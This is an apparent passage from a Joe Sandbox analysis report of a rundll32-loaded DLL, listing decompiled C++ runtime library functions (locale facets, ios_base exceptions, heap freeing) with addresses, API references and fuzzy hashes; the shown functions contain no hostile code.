0x10005bac
0x10005bb2
0x10005bbb
0x10005bc7
0x10005bcc
0x10005bd0
0x10005bd4
0x10005bda
0x10005be0
0x10005be1
0x10005be8
0x10005beb
0x10005bf5
0x10005c03
0x10005c03
0x10005c08
0x10005c0d
0x10005c13
0x10005c19
0x10005bd6
0x10005bd6
0x10005bd6
0x10005bd4
0x10005c1f
0x10005c26
0x10005c32

APIs

__EH_prolog3.LIBCMT ref: 10005B9D
std::_Lockit::_Lockit.LIBCPMT ref: 10005BA7
int.LIBCPMT ref: 10005BBE

Part of subcall function 100048D1: std::_Lockit::_Lockit.LIBCPMT ref: 100048E4

std::locale::_Getfacet.LIBCPMT ref: 10005BC7
ctype.LIBCPMT ref: 10005BE1
std::bad_exception::bad_exception.LIBCMT ref: 10005BF5
__CxxThrowException@8.LIBCMT ref: 10005C03
std::locale::facet::_Incref.LIBCPMT ref: 10005C13
std::locale::facet::facet_Register.LIBCPMT ref: 10005C19

Strings

P+x, xrefs: 10005BAC, 10005C0D
bad cast, xrefs: 10005BED

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
String ID: P+x$bad cast
API String ID: 2535038987-113731078
Opcode ID: 828ff3ebe5393bcce5bcdbe2e3ed6fc935423cba4036fe216f4306d485df9355
Instruction ID: e203c96ff711ea4c5ec8b29656bfaf5477767041d62bbfa1ce500f72ed717c7c
Opcode Fuzzy Hash: 828ff3ebe5393bcce5bcdbe2e3ed6fc935423cba4036fe216f4306d485df9355
Instruction Fuzzy Hash: B40192799006199BFB05DBA0CC52AEE7336EF443A1F254508F5106B1DADF39FA418B64

Uniqueness

Uniqueness Score: -1.00%

Function 10005DB5, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E10005DB5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t18;
				void* _t23;
				void* _t39;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E10007B2B(E100155AB, __ebx, __edi, __esi);
				E10006121(_t44 - 0x14, 0);
				_t43 =  *0x1001c498; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t18 = E100049C5( *((intOrPtr*)(_t44 + 8)), E100048D1(0x1001c530));
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E10005C33(__ebx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E10006AB2(_t44 - 0x20, "bad cast");
							E10006B9C(_t44 - 0x20, 0x10019754);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x1001c498 =  *((intOrPtr*)(_t44 - 0x10));
						E10004908( *((intOrPtr*)(_t44 - 0x10)));
						E100062C2(_t39, _t41, _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E10006149(_t44 - 0x14);
				return E10007BCA(_t41);
			}

0x10005db5
0x10005dbc
0x10005dc6
0x10005dcb
0x10005dd1
0x10005dda
0x10005de6
0x10005deb
0x10005def
0x10005df3
0x10005df9
0x10005dff
0x10005e00
0x10005e07
0x10005e0a
0x10005e14
0x10005e22
0x10005e22
0x10005e27
0x10005e2c
0x10005e32
0x10005e38
0x10005df5
0x10005df5
0x10005df5
0x10005df3
0x10005e3e
0x10005e45
0x10005e51

APIs

__EH_prolog3.LIBCMT ref: 10005DBC
std::_Lockit::_Lockit.LIBCPMT ref: 10005DC6
int.LIBCPMT ref: 10005DDD

Part of subcall function 100048D1: std::_Lockit::_Lockit.LIBCPMT ref: 100048E4

std::locale::_Getfacet.LIBCPMT ref: 10005DE6
codecvt.LIBCPMT ref: 10005E00
std::bad_exception::bad_exception.LIBCMT ref: 10005E14
__CxxThrowException@8.LIBCMT ref: 10005E22
std::locale::facet::_Incref.LIBCPMT ref: 10005E32
std::locale::facet::facet_Register.LIBCPMT ref: 10005E38

Strings

bad cast, xrefs: 10005E0C

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
String ID: bad cast
API String ID: 577375395-3145022300
Opcode ID: f314c45e71509457199dd383936f72350aa1cc9418e1238984ac05a6d19bc3a1
Instruction ID: 8643cbe4b658b194438a927f5b880ed3ce0e6d728a841d587ca3a3da82cd1a95
Opcode Fuzzy Hash: f314c45e71509457199dd383936f72350aa1cc9418e1238984ac05a6d19bc3a1
Instruction Fuzzy Hash: FE01C0799002599BFB05DBA0CC52AEF7336EF487A1F214509E5106B1DADF38FA418750

Uniqueness

Uniqueness Score: -1.00%

Function 10001C50, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E10001C50(void* __ecx, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				char _v40;
				char _v44;
				void* _v84;
				char _v88;
				char _v108;
				char _v112;
				void* _v152;
				char _v156;
				signed int _t30;
				signed int _t34;
				signed char _t48;
				void* _t60;

				_push(0xffffffff);
				_push(E10015318);
				_push( *[fs:0x0]);
				_t30 =  *0x1001b6b4; // 0xdfb20980
				_push(_t30 ^ _t60 - 0x00000088);
				 *[fs:0x0] =  &_v12;
				_t34 = _a4 & 0x00000017;
				 *(__ecx + 8) = _t34;
				_t48 =  *(__ecx + 0xc) & _t34;
				if(_t48 != 0) {
					if(_a8 != 0) {
						E10006B9C(0, 0);
					}
					_t65 = _t48 & 0x00000004;
					if((_t48 & 0x00000004) != 0) {
						E10001AA0( &_v108, "ios_base::badbit set");
						_v8 = 0;
						E100019A0(_t58, _t65,  &_v112);
						_t48 =  &_v156;
						_v156 = 0x10016268;
						E10006B9C(_t48, 0x10019390);
					}
					_t66 = _t48 & 0x00000002;
					if((_t48 & 0x00000002) != 0) {
						E10001AA0( &_v108, "ios_base::failbit set");
						_t58 =  &_v112;
						_v8 = 1;
						E100019A0( &_v112, _t66,  &_v112);
						_v156 = 0x10016268;
						E10006B9C( &_v156, 0x10019390);
					}
					E10001AA0( &_v40, "ios_base::eofbit set");
					_v8 = 2;
					E100019A0(_t58, _t66,  &_v44);
					_v88 = 0x10016268;
					_t34 = E10006B9C( &_v88, 0x10019390);
				}
				 *[fs:0x0] = _v12;
				return _t34;
			}

0x10001c50
0x10001c52
0x10001c5d
0x10001c64
0x10001c6b
0x10001c73
0x10001c80
0x10001c83
0x10001c89
0x10001c8b
0x10001c99
0x10001c9f
0x10001c9f
0x10001ca4
0x10001ca7
0x10001cb2
0x10001cc0
0x10001ccb
0x10001cd5
0x10001cda
0x10001ce2
0x10001ce2
0x10001ce7
0x10001cea
0x10001cf5
0x10001cfa
0x10001d03
0x10001d0e
0x10001d1d
0x10001d25
0x10001d25
0x10001d33
0x10001d41
0x10001d4c
0x10001d5b
0x10001d63
0x10001d63
0x10001d6f
0x10001d7d

APIs

__CxxThrowException@8.LIBCMT ref: 10001C9F

Part of subcall function 10006B9C: RaiseException.KERNEL32(?,?,10007141,?,?,?,?,?,10007141,?,100191C4,1001C660,?,100010D3,00000000,00000003), ref: 10006BDE

__CxxThrowException@8.LIBCMT ref: 10001CE2
__CxxThrowException@8.LIBCMT ref: 10001D25
__CxxThrowException@8.LIBCMT ref: 10001D63

Strings

ios_base::badbit set, xrefs: 10001CA9
ios_base::failbit set, xrefs: 10001CEC
ios_base::eofbit set, xrefs: 10001D2A

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3476068407-1866435925
Opcode ID: a07aa2ccc50533847f5c8dad4f8343c0c5a7bbb6d548ddcd04b4ede3ea91fad8
Instruction ID: 59dd748497beec8568043e93fc564504049d2a9460f8c932ba1ccde21d7b275d
Opcode Fuzzy Hash: a07aa2ccc50533847f5c8dad4f8343c0c5a7bbb6d548ddcd04b4ede3ea91fad8
Instruction Fuzzy Hash: 9A215EB5418740AEE355CB60CC42FDAB7E4EF89380F80890DF69A87185DB79A149CB23

Uniqueness

Uniqueness Score: -1.00%

Function 10007F60, Relevance: 9.0, APIs: 6, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E10007F60(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t53 = __edx;
				_push(0x2c);
				_push(0x10019a00);
				E1000B078(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E10007423(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E1000C3E3(__ecx, __edx, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E1000C3E3(_t48, __edx, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E1000C3E3(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E1000C3E3(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E100074C8(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E10008086(_t48, _t53, _t55, _t57, _t61);
				return E1000B0BD( *((intOrPtr*)(_t58 - 0x1c)));
			}

0x10007f60
0x10007f60
0x10007f60
0x10007f62
0x10007f67
0x10007f6c
0x10007f6e
0x10007f71
0x10007f74
0x10007f77
0x10007f7e
0x10007f8f
0x10007f9d
0x10007fab
0x10007fb3
0x10007fc1
0x10007fc7
0x10007fce
0x10007fd1
0x10007fe7
0x10007fea
0x1000805f
0x10008066
0x1000806d
0x1000807a

APIs

__CreateFrameInfo.LIBCMT ref: 10007F88

Part of subcall function 10007423: __getptd.LIBCMT ref: 10007431
Part of subcall function 10007423: __getptd.LIBCMT ref: 1000743F

__getptd.LIBCMT ref: 10007F92

Part of subcall function 1000C3E3: __getptd_noexit.LIBCMT ref: 1000C3E6
Part of subcall function 1000C3E3: __amsg_exit.LIBCMT ref: 1000C3F3

__getptd.LIBCMT ref: 10007FA0
__getptd.LIBCMT ref: 10007FAE
__getptd.LIBCMT ref: 10007FB9
_CallCatchBlock2.LIBCMT ref: 10007FDF

Part of subcall function 100074C8: __CallSettingFrame@12.LIBCMT ref: 10007514

Part of subcall function 10008086: __getptd.LIBCMT ref: 10008095
Part of subcall function 10008086: __getptd.LIBCMT ref: 100080A3

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: d8abb42c3c29ad143a40f4adfd576839e02e6d599755f7ca258e769317ed5c19
Instruction ID: 3582c551e006ef8332b87da498695a48188647825b81d49dd4b3c68d68ee0da3
Opcode Fuzzy Hash: d8abb42c3c29ad143a40f4adfd576839e02e6d599755f7ca258e769317ed5c19
Instruction Fuzzy Hash: 5711C6B5C04309DFEB40DFA4C845BAEBBB1FF04350F108069F854A7256DB79AA559F90

Uniqueness

Uniqueness Score: -1.00%

Function 1000A312, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E1000A312(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x10019be8);
				E1000B078(__ebx, __edi, __esi);
				_t28 = E1000C3E3(__ebx, __edx, __edi, _t30);
				_t13 =  *0x1001bff0; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E1000BA3C(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x1001c0d8; // 0x782b70
					 *((intOrPtr*)(_t29 - 0x1c)) = E1000A2D4(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E1000A37C();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E1000C3E3(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E1000B5DD(_t25, _t26, 0x20);
				}
				return E1000B0BD(_t28);
			}

0x1000a312
0x1000a312
0x1000a312
0x1000a312
0x1000a312
0x1000a314
0x1000a319
0x1000a323
0x1000a325
0x1000a32d
0x1000a351
0x1000a353
0x1000a359
0x1000a35d
0x1000a360
0x1000a36b
0x1000a36e
0x1000a375
0x1000a32f
0x1000a32f
0x1000a333
0x00000000
0x1000a335
0x1000a33a
0x1000a33a
0x1000a333
0x1000a33f
0x1000a343
0x1000a348
0x1000a350

APIs

__getptd.LIBCMT ref: 1000A31E

Part of subcall function 1000C3E3: __getptd_noexit.LIBCMT ref: 1000C3E6
Part of subcall function 1000C3E3: __amsg_exit.LIBCMT ref: 1000C3F3

__getptd.LIBCMT ref: 1000A335
__amsg_exit.LIBCMT ref: 1000A343
__lock.LIBCMT ref: 1000A353

Strings

p+x, xrefs: 1000A360

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: p+x
API String ID: 3521780317-2199827749
Opcode ID: b6e24982ca4f0abf2170a641bb62e3ab9e9cb4ff580087cec0354d81b7f79bf3
Instruction ID: be8f39f4e2942826d49de5c325bba63c94364e0d9d017793ec51b6b6a4f33ce2
Opcode Fuzzy Hash: b6e24982ca4f0abf2170a641bb62e3ab9e9cb4ff580087cec0354d81b7f79bf3
Instruction Fuzzy Hash: D9F01236944B14CAF650EB758842B4D72E0EB056D0F118359B451972DACB74BA81DB92

Uniqueness

Uniqueness Score: -1.00%

Function 1000FB43, Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E1000FB43(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x10019e70);
				E1000B078(__ebx, __edi, __esi);
				_t31 = E1000C3E3(__ebx, __edx, __edi, _t35);
				_t15 =  *0x1001bff0; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E1000BA3C(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x1001bef8; // 0x7817d0
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x1001bad0;
								if(__eflags != 0) {
									_push(_t33);
									E100088C4(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x1001bef8; // 0x7817d0
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x1001bef8; // 0x7817d0
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E1000FBDE();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E1000B5DD(_t29, _t31, 0x20);
				}
				return E1000B0BD(_t33);
			}

0x1000fb43
0x1000fb43
0x1000fb43
0x1000fb43
0x1000fb45
0x1000fb4a
0x1000fb54
0x1000fb56
0x1000fb5e
0x1000fb7f
0x1000fb85
0x1000fb89
0x1000fb8c
0x1000fb8f
0x1000fb95
0x1000fb97
0x1000fb99
0x1000fb9c
0x1000fba2
0x1000fba4
0x1000fba6
0x1000fbac
0x1000fbae
0x1000fbaf
0x1000fbb4
0x1000fbac
0x1000fba4
0x1000fbb5
0x1000fbba
0x1000fbbd
0x1000fbc3
0x1000fbc7
0x1000fbc7
0x1000fbcd
0x1000fbd4
0x1000fb66
0x1000fb66
0x1000fb66
0x1000fb6b
0x1000fb6f
0x1000fb74
0x1000fb7c

APIs

__getptd.LIBCMT ref: 1000FB4F

Part of subcall function 1000C3E3: __getptd_noexit.LIBCMT ref: 1000C3E6
Part of subcall function 1000C3E3: __amsg_exit.LIBCMT ref: 1000C3F3

__amsg_exit.LIBCMT ref: 1000FB6F
__lock.LIBCMT ref: 1000FB7F
InterlockedDecrement.KERNEL32(?), ref: 1000FB9C
InterlockedIncrement.KERNEL32(007817D0), ref: 1000FBC7

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 1fc9e50a6f3c38f3c6da37f588213a1678a2b1d9f24174b65c9d581a57e08b42
Instruction ID: c8fcaf5e22097e742a9bdb40054c08dc1743f3f723e9023cf81a15dec3e80e28
Opcode Fuzzy Hash: 1fc9e50a6f3c38f3c6da37f588213a1678a2b1d9f24174b65c9d581a57e08b42
Instruction Fuzzy Hash: DD018E36900B269BF611DB65CC55B6E73A0EF087D0F05405DE81067A98CB74A980DFD2

Uniqueness

Uniqueness Score: -1.00%

Function 100088C4, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 41%

			E100088C4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x10019aa0);
				_t8 = E1000B078(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E1000B0BD(_t8);
				}
				if( *0x1001d108 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x1001ce88, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E1000B02E(_t31);
						 *_t10 = E1000AFEC(GetLastError());
					}
					goto L9;
				}
				E1000BA3C(__ebx, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1000CD72(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1000CDA2();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1000891A();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x100088c4
0x100088c6
0x100088cb
0x100088d0
0x100088d5
0x1000894c
0x10008951
0x10008951
0x100088de
0x10008923
0x10008924
0x1000892c
0x10008932
0x10008934
0x10008936
0x10008949
0x1000894b
0x00000000
0x10008934
0x100088e2
0x100088e8
0x100088ed
0x100088f3
0x100088f8
0x100088fa
0x100088fb
0x100088fc
0x10008902
0x10008903
0x1000890a
0x10008913
0x00000000
0x10008915
0x10008915
0x00000000
0x10008915

APIs

__lock.LIBCMT ref: 100088E2

Part of subcall function 1000BA3C: __mtinitlocknum.LIBCMT ref: 1000BA52
Part of subcall function 1000BA3C: __amsg_exit.LIBCMT ref: 1000BA5E
Part of subcall function 1000BA3C: EnterCriticalSection.KERNEL32(1000C386,1000C386,?,10010532,00000004,10019EB0,0000000C,10009EA2,00000001,1000C395,00000000,00000000,00000000,?,1000C395,00000001), ref: 1000BA66

___sbh_find_block.LIBCMT ref: 100088ED
___sbh_free_block.LIBCMT ref: 100088FC
HeapFree.KERNEL32(00000000,00000001,10019AA0), ref: 1000892C
GetLastError.KERNEL32(?,10010532,00000004,10019EB0,0000000C,10009EA2,00000001,1000C395,00000000,00000000,00000000,?,1000C395,00000001,00000214), ref: 1000893D

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 43b70d94d9c70d09d08384de12ffb14a2553d7507b73d9099cbd980e60a2b477
Instruction ID: 35771ef2d26983b381daecb6ba0ab14fd357d25ff35c1b15e177ba19234aba39
Opcode Fuzzy Hash: 43b70d94d9c70d09d08384de12ffb14a2553d7507b73d9099cbd980e60a2b477
Instruction Fuzzy Hash: D201A235805316AAFB20FF709C0AB6E3AE4EF013E4F244119F444A6099CB34EA80CB56

Uniqueness

Uniqueness Score: -1.00%

Function 1000830D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 28%

			E1000830D(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E1000827B(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E1000717B(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E10007CE5(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E10007F60(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
				if(_t20 != 0) {
					E10007142(_t20, _t27);
					return _t20;
				}
				return _t20;
			}

0x1000830d
0x1000830d
0x1000830d
0x1000830d
0x1000830d
0x10008312
0x10008316
0x10008318
0x1000831b
0x1000831c
0x1000831d
0x10008320
0x10008325
0x10008325
0x10008328
0x1000832c
0x1000832f
0x10008334
0x10008331
0x10008331
0x10008331
0x10008337
0x1000833c
0x1000833e
0x10008341
0x10008344
0x10008345
0x1000834d
0x10008352
0x10008356
0x10008359
0x1000835c
0x10008362
0x10008363
0x10008366
0x10008370
0x10008374
0x00000000
0x10008374
0x1000837a

APIs

___BuildCatchObject.LIBCMT ref: 10008320

Part of subcall function 1000827B: ___BuildCatchObjectHelper.LIBCMT ref: 100082B1

_UnwindNestedFrames.LIBCMT ref: 10008337
___FrameUnwindToState.LIBCMT ref: 10008345

Strings

csm, xrefs: 1000831C, 10008331, 10008344, 10008362, 10008372

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: d83d8fdc591bf5ebad8e36828610a1efa5597a14133a2e7603aaa7ae4084a27f
Instruction ID: a58079fbc8efe559b7519203738159b5da1fe66325aa0d8746bc6bba66cd6c4f
Opcode Fuzzy Hash: d83d8fdc591bf5ebad8e36828610a1efa5597a14133a2e7603aaa7ae4084a27f
Instruction Fuzzy Hash: 8601E47540110ABBEF129F51CC41EEA7FAAFF583D4F104014BD5815169DB36EAB1DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10007C9C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E10007C9C(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				void* _t23;

				_t25 = __edi;
				_t24 = __edx;
				_t11 =  *((intOrPtr*)( *_a4));
				if(_t11 == 0xe0434f4d) {
					__eflags =  *((intOrPtr*)(E1000C3E3(_t23, __edx, __edi, __eflags) + 0x90));
					if(__eflags > 0) {
